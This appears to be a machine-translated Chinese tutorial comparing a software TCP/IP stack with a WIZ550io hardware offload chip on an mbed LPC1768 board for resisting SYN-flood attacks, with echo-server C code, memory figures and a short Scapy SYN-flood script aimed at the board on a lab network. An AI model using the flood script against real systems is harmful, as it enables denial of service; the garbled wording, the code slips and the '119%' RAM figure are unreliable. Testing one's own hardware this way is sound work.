簡介

DDoS攻擊是什麼?
DDoS攻擊繼續上升
物聯網設備可以被用來支持DDoS攻擊
**什麼是防火牆物聯網?**
– 我們將比較傳統的方法,並在DoS攻擊(Syn-flood 攻擊)所提出的方法。

物聯網平台:mbed LPC1768 NXP

image

它是基於恩智浦LPC1768,具有在96MHz的32位ARM Cortex-M3內核上運行。 它包括512KB的FLASH,32KB的RAM和大量的接口,包括內置的以太網 ,USB主機和設備,CAN,SPI,I2C,ADC,DAC,PWM等I / O接口。 上述引出線表示常用的接口和它們的位置。 請注意,所有的數字的針(P5-P​​30)也可以用作DigitalIn和DigitalOut接口。 

-鏈接1: 欲了解更多詳情

傳統方法:LwIP的(TCP / IP軟件堆棧)+以太網MAC(LPC1768)+以太網PHY(DP83848J)@mbed應用電路板(以太網連接)

image

*功能列表
* 128×32圖​​形LCD
* 5向搖桿
* 2×電位
* 3.5mm音頻插孔(模擬輸出)
*揚聲器,連接PWM
* 3軸/ 11.5克加速度
* 3.5mm音頻插孔(模擬輸入)
* 2個伺服電機頭
* RGB LED,PWM連接
* USB迷你-B連接器
*溫度傳感器
*插座為的XBee(紫蜂)或RN-XV(WIFI)
* RJ45以太網連接器
* USB-A接口
*1.3毫米DC輸入插孔

鏈接2: mbed應用板在mbed.org 

建議方法:WIZ550io(TOE +以太網MAC + PHY以太網)

image

-鏈接3: WIZ550io 組件在 mbed.org 
-鏈接4: W5500 組件在 mbed.org

應用程序 iperf

recv的唯一codess軟件堆棧

固定在mbed迴聲服務器。

#include "mbed.h"
#include "EthernetInterface.h"

EthernetInterface eth;
int main() 
{
    printf("Trying rn");
    // as your env. change to real IP address and so on.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");    

    if (!ret) {
        printf("Initialized, MAC: %snr", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %snr",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %dnr", ret);
        return -1;
    }

  eth.connect();
  printf("IP Address is %sn", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("nWait for new connection...n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %sn", client.get_address());

        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected

        }
        client.close();
    }
}

recv的唯一codess的TOE

#include <stdio.h>
#include <string.h>
#include "mbed.h"
#include "EthernetInterface.h"


//DigitalOut myled(LED1);
//Serial pc(USBTX , USBRX);
int main() {

    printf("Test - WIZ550iorn");

    /** Set the spi bus clock frequency
     *
     *  @param hz SCLK frequency in hz (default = 1MHz)
     *  Maximum SPI data bit rate of 12.5 Mbit/s in LPC176X
    */
    spi.frequency(12500000);     
    SPI spi(p5, p6, p7); // mosi, miso, sclk
    EthernetInterface eth(&spi, p8, p11); // spi, cs, reset

    // as your env. change to real IP address and so on.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");    
    if (!ret) {
        printf("Initialized, MAC: %snr", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %snr",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %dnr", ret);
        return -1;
    }

    printf("IP Address is %sn", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("nWait for new connection...n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %sn", client.get_address());

        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected
        }
        client.close();
    }
}

碼和內存大小
軟件堆棧TOE(W5500)代碼

sw stack codes
TOE codes

Memory usage

sw memory usage
sw memory usage

35.2kB(110%) : LPC1768有3 RAM庫:一個通用32kB的之一,和兩個aditional的那些16kB的每個以太網/ USB/ CAN的目的。以太網完全填滿這些額外的銀行之一。在線編譯器考慮到這一點總RAM的用法,但假設只有32kB的是可用的,所以它得到了100%的是什麼顯示,仍然會正常工作,但。 (來自mbed.org: developer.mbed.org)

** TOE能減少閃光燈和RAM分別的使用了7%和119%。 **

DoS攻擊(SYN洪水攻擊)

我們使用Scapy的(Python庫)的DoS攻擊。

from scapy.all import

inter = input('inter(time in seconds to wait between 2packets) :')

def synFlood(src, tgt, inter):
    IPlayer = IP(src, dst=tgt)
    TCPlayer= TCP(sport=3000, dport=3000) # as your env. change source and destination port
    pkt = IPlayer / TCPlayer
    send(pkt, loop=1, inter=inter) #

#send(pkts, inter=0, loop=0, verbose=None)
#  Send packets at layer 3, using the conf.L3socket supersocket. pkts can
#  be a packet, an implicit packet or a list of them.
#
#  loop: send the packets endlessly if not 0.
#  inter: time in seconds to wait between 2 packets
#  verbose: override the level of verbosity. Make the function totally silent when 0.
#   * Refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf for more detail.


# as your env. change to real IP address and so on.
src = "192.168.77.000" # PC IP address
tgt = "192.168.77.34"  # target board (LPC1768)

synFlood(src, tgt, inter)